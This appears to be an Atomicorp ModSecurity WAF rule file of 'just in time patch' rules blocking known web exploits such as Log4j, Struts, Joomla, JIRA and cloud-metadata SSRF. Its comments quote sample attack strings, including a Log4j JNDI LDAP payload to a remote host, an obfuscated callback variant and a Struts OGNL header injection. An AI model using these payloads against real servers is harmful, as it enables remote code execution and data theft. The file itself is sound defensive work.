SecRule REQUEST_URI "/server\.np" "chain,id:390666,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability'"
SecRule ARGS:template "\.\./"
# Rule 310019: phpBB <= 2.0.17 remote command execution exploit
#SecRule REQUEST_URI|ARGS "(?:r57phpbb2017xpl|_bill_gates@microsoft\.com)" # "id:393667,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB <= 2.0.17 remote command execution exploit'"
# Rule 310019: TFT Gallery "passwd" Exposure of user Credentials
SecRule REQUEST_URI "admin/passwd$" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TFT Gallery passwd Exposure of user Credentials'"
# Rule 310019: WEBalbum Local File Inclusion Vulnerability
SecRule REQUEST_COOKIES:skin2 "\.\." "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WEBalbum Local File Inclusion Vulnerability'"
# Rule 310019: Horde Help Module Remote Execution
SecRule REQUEST_URI "/services/help/\?" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390040,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde Help Module Remote Execution'"
SecRule ARGS:module ";"
# Rule 310019: ManageEngine OpManager "searchTerm" Cross-Site Scripting
SecRule REQUEST_URI "search\.do" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390048,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ManageEngine OpManager searchTerm Cross-Site Scripting'"
SecRule ARGS:searchTerm "(?:script|about|applet|activex)"
# Rule 310019: Horde passthru protection
#SecRule REQUEST_URI "/services/help(/)?\?(.*)?\&module=.*passthru\(.*\)" "id:390066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde passthru exploit'"
SecRule REQUEST_URI "/services/help" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390066,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde passthru exploit'"
SecRule ARGS:module "\("
# Rule 310019: test for valid X-forearded header
#SecRule REQUEST_HEADERS:X_FORWARDED_FOR "!^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|)|unknown),?(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|)|unknown)?" "id:390080,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Test: Checking for valid X-Forwarded header',log,pass"
# Rule 310019: TikiWiki jhot.php upload exploit
SecRule REQUEST_URI "img/wiki/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki non-image upload exploit'"
SecRule REQUEST_URI "\.!(jpe?g|gif|png|bmp)"
# Rule 310019: TWiki "filename" Parameter Disclosure of Sensitive information
SecRule REQUEST_URI "/twiki/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390110,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki filename Parameter Disclosure of Sensitive information'"
SecRule ARGS:filename "\.\./\.\."
# Rule 310019: Servlet auth attack
SecRule REQUEST_URI "/servlet/admin\?category=server\&method=listall\&authorization" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Servlet Auth exposure Vulnerability'"
# Rule 310019: Eazy Cart Multiple Vulnerabilities
SecRule REQUEST_URI "admin/config/customer\.dat" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart Customer Data Access'"
#e-Classifieds Corporate Edition "db" Cross-Site Scripting
SecRule REQUEST_URI "/hsx/classifieds\.hsx" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390168, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e-Classifieds Corporate Edition db Cross-Site Scripting'"
SecRule ARGS:db "script"
#Aztech ADSL2/2+ 4 Port remote root
SecRule REQUEST_URI "cgi-bin/script\?system &" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:390172, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Aztech ADSL2/2 remote root '"
#Joomla token exploit
SecRule ARGS:option "com_user" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:393204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla token exploit'"
SecRule ARGS:task "confirmreset" chain
SecRule ARGS:token "!([a-z0-9-]{32})"
#Joomla search SQL injection
SecRule ARGS:catid "jos_users" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:390600,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla catid ARG SQL injection'"
#JAMWiki "message" Cross-Site Scripting Vulnerability
#Special:Login?message=XSS
SecRule REQUEST_URI "special\:login" "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:393652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JAMWiki message Cross-Site Scripting Vulnerability'"
SecRule ARGS:message "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"
#Floating point DOS JITP
SecRule ARGS|REQUEST_HEADERS "@contains 2.2250738585072012e-308" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:370651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Floating Point DoS Attack'"
#RoR POC exploit
SecRule REQUEST_HEADERS:Content-Type "@contains text/xml" "deny,log,auditlog,status:403,chain,id:376419,rev:1,phase:2,t:none,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Ruby on Rails XML Exploit Attempt',logdata:'%{matched_var}',tag:'CVE-2013-0156'"
SecRule XML:/* "\!ruby/" "t:none,t:lowercase"
#Apache struts
#index.action
#/struts2-rest-showcase/orders.xhtml
SecRule REQUEST_URI "/struts2-rest-showcase/orders\.xhtml" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:370662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Struts Probe'"
SecRule REQUEST_URI "/index\.action.{1,100}com\.opensymphony\.xwork2\.dispatcher\.HttpServletRequest" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:370652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Struts Probe'"
#a2billing/customer/templates/default/header.tpl
SecRule REQUEST_URI "a2billing/customer/templates/default/header.tpl" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:372356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: a2billing Probe'"
#/s/cfx/_/;
SecRule REQUEST_URI "/s/cfx/_/;" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:345113,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA CVE-2021-26086 attack blocked'"
SecMarker END_JITP
#released from ebargoed rules 12/10
#REQUEST_HEADERS
#"${jndi:ldap://1.2.3.4:12344/Basic/Command/Base64/somehash=}"
#SecRule REQUEST_HEADERS "\{jndi\:ldap\:/"
SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "(?:(?:\{jndi|\{ctx)\:[a-z]+\:/|\:(?:dns|ldaps?|iiop|rmi)\$\{)" "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase,id:345115,rev:7,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 attack blocked'"
#${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie "\{.{,50}j.{,50}n.{,50}d.{,50}i.{,50}\:.{,50}/.{,50}[a-z]" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,t:cmdline,multimatch,id:345114,rev:9,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 obfuscated attack blocked'"
#${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
SecRule REQUEST_URI|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/* "[$]{[\w\${}\-:]*j[\w\${}\-:]*n[\w\${}\-:]*d[\w\${}\-:]*i[\w\${}\-:]*:.*}" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,t:cmdline,multimatch,id:345117,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked'"
#/${${
SecRule REQUEST_URI "(?:/\$\{\$\{|env:(?:env_name|user)|\$\{jndi)" "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,id:345118,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked'"
#SecRule REQUEST_HEADERS "\${(\${(.*?:|.*?:.*?:-)(\'|\"|\`)*(?1)}*|[jndi:(ldaps?|rm|dns)](\'|\"|\`)*}*){9,10}" # "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,id:345116,rev:3,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 attack blocked'"
#Released from encrypted rules 3/4/20
SecRule &ARGS:do_reset_wordpress "@eq 1" "deny,log,auditlog,status:403,t:none,id:375357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Themegrill site reset attempt blocked'"
#';$r=$_REQUEST
SecRule REQUEST_URI "\';\$r=\$_request" "phase:2,deny,id:332751,rev:2,severity:1,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: b2evolution CMS 6.6.0 - 6.8.10 PHP code execution attack blocked'"
#Added for systems that disable the content type protection rules
SecRule REQUEST_HEADERS:Content-Type "(?:\%\{\(|cmds?=\')" "phase:2,deny,id:332791,rev:2,severity:1,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Apache Struts RCE Attack'"
#sanity check content-type header
#example attack
#Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('xqmuvam','xqmuvam')}.multipart/form-data
SecRule REQUEST_HEADERS:Content-Type "!@rx ^[a-z0-9/\+\.\;\-\, \=\"\%_\*]+$" "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Request content type header contains invalid characters',id:'334168',rev:8,severity:'2',capture,logdata:'%{TX.0}'"
#Vulnerability scanner
SecRule ARGS "wf_xsrf\.html" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,id:390692,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting XSRF probe'"
#Mcafee: ResponseSplitting
SecRule REQUEST_BODY "mcafee: responseplitting" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390690,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting response splitting'"
#Vulnerability scanner
SecRule ARGS "quotetest ?(?:\"|\'|\`)1(?:\"|\'|\`)1(?:\"|\'|\`)" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390691,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting SQL unescape probe'"
SecRule REQUEST_URI "/uploads/backupbuddy_backups/" "id:311009,rev:3,chain,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skipAfter:BACKUP_BUDDY"
SecRule REQUEST_HEADERS:REFERER "/wp-admin/admin\.php\?page=(?:pluginbuddy_backupbuddy-backup|pb_backupbuddy)"
SecRule REQUEST_URI "/uploads/backupbuddy_backups/" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:397679,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unauthorized attempt to access insecure BackupBuddy backup.'"
SecMarker BACKUP_BUDDY
#Detect Backupbuddy download, but dont block
SecRule REQUEST_URI "/uploads/backupbuddy_backups/" "pass,status:403,t:none,t:urlDecodeUni,t:lowercase,id:397678,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to unauthenticated BackupBuddy backup file. Not blocked.',log,auditlog"
#gitorious
SecRule REQUEST_URI "/repo/log/graph/`" "t:none,t:urlDecodeUni,t:lowercase,id:397680,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attempt to exploit command injection vulnerability in Gitorious.'"
#grapfile upload
#images, avis, mp3s, zips
SecRule REQUEST_URI "/wp-content/plugins/grapefile/filestore/avi/" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381236,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to non media file uploaded via grapfile WP plugin denied',logdata:'%{TX.0}'"
SecRule REQUEST_URI "!(avi|jpe?g|png|mp3|zip|rar|gif)$"
#Worm
#/HNAP1/
SecRule REQUEST_URI "/HNAP1/" "log,deny,log,auditlog,t:none,capture,id:381237,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DLINK worm probe',logdata:'%{TX.0}'"
#Worm
#/info/whitelist.pac
SecRule REQUEST_URI "/info/whitelist\.pac" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381238,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /info/whitelist.pac worm probe',logdata:'%{TX.0}'"
#Really vulnerable app
#src="
SecRule ARGS " ?src ?= ?\" ?https?:/" "log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,id:381239,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: XSS attack',logdata:'%{TX.0}'"
#phpsysinfo
#SecRule REQUEST_URI "(?:/phpsysinfo|ehcp_postfix\.sh|/ehcp/(?:apache(?:hcp|_|template)|named_|ehcp(?:-apt-get-install\.log|install)|.*\.(?:co?nf|sh|sql|cert|key)$|ehcp_?daemon|/etc(?:/apache|logrotate.d)|php(?:admin|myadmin)|scriptsupdate\.sql|stats.\php|/misc/(?:importexport|mysqltroubleshooter|redirect_index\.html|serverstatus\.sh)))" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel information leak attack denied',logdata:'%{TX.0}'"
#wp-content/uploads/filename/.*.php;.jpg
#SecRule REQUEST_URI "wp-content/uploads/.*\.ph(?:p|tml|t)"
SecRule REQUEST_FILENAME "wp-content/uploads/.*\.ph(?:p|tml|t)" "phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:382238,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP file execution in uploads directory denied',logdata:'%{TX.0}'"
#GET /status?full=true
#jboss status probe
SecRule REQUEST_URI "/status\?full=true" "phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:382240,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JBOSS probe denied'"
#JIRA
#block
#https://www.mysite.com/login?os_destination=https://www.google.com would
SecRule REQUEST_URI "login" "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382292,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA attack blocked'"
SecRule ARGS:os_destination "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/"
# https://www.mysite.com/login?os_destination=/login.jsp is ok.
#SecRule REQUEST_URI "login" "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382293,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA attack blocked'"
#SecRule ARGS:os_destination "!(^/login\.jsp$|^$|^\%browse\%)" "t:none,t:urlDecodeUni"
#plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
SecRule REQUEST_URI "plugins/servlet/oauth/users/icon-uri" "chain,phase:2,status:403,log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:382291,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA SSRF attack blocked'"
SecRule ARGS:consumerUri "^http"
SecMarker END_JITP_SPECIAL
#Embargo violated so details public
SecRule ARGS|!ARGS:/message/|!ARGS:post|!ARGS:/email/|XML:/* "\:/?/169\.254\.[0-9]+\.[0-9]+/[a-z]+/" "phase:2,status:403,deny,log,auditlog,id:337109,rev:4,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:hexdecode,t:base64decode,t:lowercase,t:removeWhiteSpace,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SSRF attack blocked'"
#/latest/meta-data/
SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/message/|!ARGS:post "/latest/meta-data/" "phase:2,status:403,deny,log,auditlog,id:337110,rev:5,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:hexdecode,t:lowercase,t:removeWhiteSpace,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AWS SSRF attack blocked'"
SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/message/|!ARGS:post "/latest/meta-data/" "phase:2,status:403,deny,log,auditlog,id:337111,rev:5,severity:2,t:none,t:base64decode,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AWS SSRF attack blocked'"
#memcached SSRF
SecRule ARGS|REQUEST_URI|!ARGS:/message/|!ARGS:post "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|ssh2?|dict|expect|(?:ht|f)tps?)://?[a-z0-9\.]+/\:11211" "phase:2,status:403,deny,log,auditlog,id:337181,rev:2,severity:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible memcached SSRF attack blocked'"
Reference in New Issue View Git Blame Copy Permalink